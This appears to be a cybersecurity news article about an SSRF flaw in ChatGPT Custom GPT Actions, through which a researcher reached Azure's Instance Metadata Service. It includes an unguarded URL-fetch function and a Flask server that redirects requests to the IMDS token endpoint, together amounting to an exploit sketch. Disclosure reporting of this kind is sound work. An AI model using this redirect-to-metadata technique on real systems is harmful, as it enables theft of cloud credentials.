ChatGPT Hacked Using Custom GPTs Exploiting SSRF Vulnerability to Expose Secrets

Source: Cyber Security News

A Server-Side Request Forgery (SSRF) vulnerability in the Custom GPT ‘Actions’ feature of OpenAI’s ChatGPT allowed attackers to reach internal cloud metadata endpoints, putting sensitive Azure credentials at risk. The flaw was identified by Open Security during experimentation with the feature, underscoring the risks of handling user-controlled URLs. SSRF vulnerabilities let attackers coerce a server into requesting unintended resources, potentially bypassing firewalls and extracting privileged data.
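The general SSRF pattern can be sketched in a few lines: a backend fetches a user-supplied URL without restricting the destination, so the request can be pointed at internal, link-local addresses such as a cloud metadata service. The snippet below is an illustrative sketch only, not OpenAI’s code; the URLs and function names are assumptions.

```python
# Illustrative SSRF sketch (assumed example, not OpenAI's implementation).
import requests

# Azure's Instance Metadata Service lives at a link-local address and is only
# reachable from inside the cloud instance itself.
METADATA_URL = "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

def fetch_user_url(url: str) -> str:
    # Vulnerable: no allowlist and no check for internal or link-local targets,
    # so whatever URL the user supplies is fetched from the server's network.
    resp = requests.get(url, timeout=5)
    return resp.text

# An attacker who controls `url` can aim it at the metadata endpoint:
# fetch_user_url(METADATA_URL)
# Note: Azure's IMDS additionally requires a "Metadata: true" request header,
# which is why header injection mattered in the reported attack.
```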

Research indicates that as cloud adoption grows, SSRF risks intensify, particularly because major providers expose metadata endpoints containing critical instance details. While working with Custom GPTs, the researcher used the ‘Actions’ feature to initiate calls to external APIs. Initial attempts to reach the metadata service directly failed because Actions require HTTPS URLs, but a redirect technique bypassed the restriction, allowing the request to reach Azure’s Instance Metadata Service, with the Action’s API-key fields used to inject the required headers.
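One way such a redirect step could work, assuming the mechanics described above, is an attacker-controlled HTTPS endpoint that answers with a 302 pointing at the HTTP-only IMDS address. The sketch below is hedged: the endpoint path, the IMDS query, and the use of the Action’s header configuration are assumptions for illustration, not the researcher’s exact payload.

```python
# Hedged sketch of a redirect-based SSRF hop (assumed details for illustration).
# The Custom GPT Action targets this attacker-controlled HTTPS URL, satisfying the
# HTTPS requirement; the response redirects the server-side request to Azure IMDS.
from flask import Flask, redirect

app = Flask(__name__)

# Azure Instance Metadata Service: link-local, HTTP only, requires "Metadata: true".
IMDS = ("http://169.254.169.254/metadata/identity/oauth2/token"
        "?api-version=2018-02-01&resource=https://management.azure.com/")

@app.route("/redirect")
def to_imds():
    # The Action follows this redirect from inside the provider's infrastructure.
    # The "Metadata: true" header would be supplied via the Action's API-key/header
    # configuration, since IMDS rejects requests without it.
    return redirect(IMDS, code=302)

if __name__ == "__main__":
    # In the reported scenario this would sit behind a valid HTTPS endpoint.
    app.run(host="0.0.0.0", port=8080)
```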

👉 Read the original: Cyber Security News